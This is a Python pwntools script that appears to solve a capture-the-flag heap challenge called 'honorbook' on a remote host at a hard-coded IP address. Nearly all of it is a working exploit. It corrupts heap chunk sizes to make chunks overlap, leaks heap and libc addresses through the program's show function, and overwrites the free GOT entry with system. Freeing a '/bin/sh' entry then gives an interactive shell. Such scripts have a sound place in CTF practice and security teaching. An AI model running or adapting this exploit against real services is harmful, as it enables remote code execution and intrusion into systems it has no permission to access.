from pwn import *
import os

# Verbose pwntools I/O logging for the whole session.
context.log_level = 'debug'

# Target binary and the libc build it is paired with in this script.
elf = ELF('./honorbook')
libc = ELF('./libs/lib/libc-2.27.so')
free_got = elf.got['free']


def gdb_attach():
    """Open a terminal running gdb-multiarch against a remote stub on 127.0.0.1:1234.

    Local debugging helper only; it is not called anywhere in the visible script.
    The command is a fixed string (no caller-supplied data), so passing it
    through a shell via `os.system` introduces no injection surface here.
    """
    gdb_cmd = "gdb-multiarch test_mips -ex 'target remote 127.0.0.1:1234'"
    os.system('xfce4-terminal -x sh -c "%s"' % gdb_cmd)
# Connection to the challenge service; every helper below talks through it.
p = remote('121.36.192.114', '9999')


def add(id, name, msg):
    """Menu option 1: create entry `id` with the given name and message.

    `name` and `msg` are sent raw (no trailing newline is appended), so the
    caller controls the exact bytes written after each prompt.
    """
    p.sendlineafter('Code', '1')
    p.sendlineafter('ID', str(id))
    p.sendafter('name', name)
    p.sendafter('Msg', msg)


def free(id):
    """Menu option 2: delete entry `id`."""
    p.sendlineafter('Code', '2')
    p.sendlineafter('ID', str(id))


def show(id):
    """Menu option 3: display entry `id` and return `[name, msg]`.

    `name` is whatever `recv(27)` yields after the 'Username: ' prompt (at
    most 27 bytes; a short read is not retried); `msg` is the remainder of
    the 'Msg: ' line with its newline dropped. Both are printed for debugging.
    """
    p.sendlineafter('Code', '3')
    p.sendlineafter('ID', str(id))
    p.recvuntil('Username: ')
    username = p.recv(27)
    print(username)
    p.recvuntil('Msg: ')
    message = p.recvuntil('\n', drop=True)
    print(message)
    return [username, message]
def edit(id, msg):
    """Menu option 4: replace the message of entry `id`.

    Note the service prompts with 'Index' here rather than 'ID' as in the
    other menu options; `msg` is sent raw with no newline appended.
    """
    choice, index = '4', str(id)
    p.sendlineafter('Code', choice)
    p.sendlineafter('Index', index)
    p.sendafter('Msg', msg)
# Wait for the operator before sending any traffic.
pause()

# Create entries 0..7; entry 1 gets a longer message ending in p64(0x31).
add(0, 'a' * 0x18, 'b' * 0x10 + '\n')
add(1, 'a' * 0x18, 'b' * 0xb8 + p64(0x31) + '\n')
for slot in range(2, 8):
    add(slot, 'a' * 0x18, 'b' * 0x10 + '\n')

# Read entry 0 back; bytes 24..26 of the returned name field are widened
# to 8 bytes and decoded as a little-endian value.
leak1 = show(0)
heap_addr = u64(leak1[0][24:27].ljust(8, '\x00'))
print(hex(heap_addr))
# Recreate entry 0 with a 0xe8-byte message whose final byte is 0xf1.
free(0)
add(0, 'a' * 0x18, 'c' * 0xe8 + '\xf1')
# Delete entries 2..7, then entry 1.
for slot in range(2, 8):
    free(slot)
free(1)
'''
0x25f80: 0x6363636363636363 0x00000000000000f1
0x25f90: 0x0000004000aa79f8 0x0000004000aa79f8
0x25fa0: 0x6161616161616161 0x0000000000025fc0
0x25fb0: 0x0000000000000000 0x00000000000000f1
0x25fc0: 0x0000000000026680 0x6262626262626262
'''
# Re-create entries 2..7 (names '0'*0x18 .. '5'*0x18), then entry 1 with
# a name and message built from '/bin/sh\x00'.
for slot in range(2, 8):
    add(slot, str(slot - 2) * 0x18, 'b' * 0x10 + '\n')
add(1, '/bin/sh\x00' * 3, '/bin/sh\x00' * 2 + '\n')
# Add entry 8, then change entry 2's message to '2'*0x18 followed by p64(free_got).
add(8, '8' * 0x18, 'f' * 0x10 + '\n')
edit(2, '2' * 0x18 + p64(free_got))
print(hex(free_got))

# Read entry 8 back; the first 3 bytes of its message are widened to 8 bytes
# and decoded, and the libc base / system address are derived from that value
# using the symbol offsets of the libc loaded above.
leak_2 = show(8)
free_addr = u64(leak_2[1][:3].ljust(8, '\x00'))
libc_addr = free_addr - libc.sym['free']
system = libc_addr + libc.sym['system']
print(hex(libc_addr))
print(hex(system))

# Write the low 3 bytes of the computed system address into entry 8's
# message, then delete entry 1.
edit(8, p64(system)[:3])
free(1)
# Hand the open connection over to the operator.
p.interactive()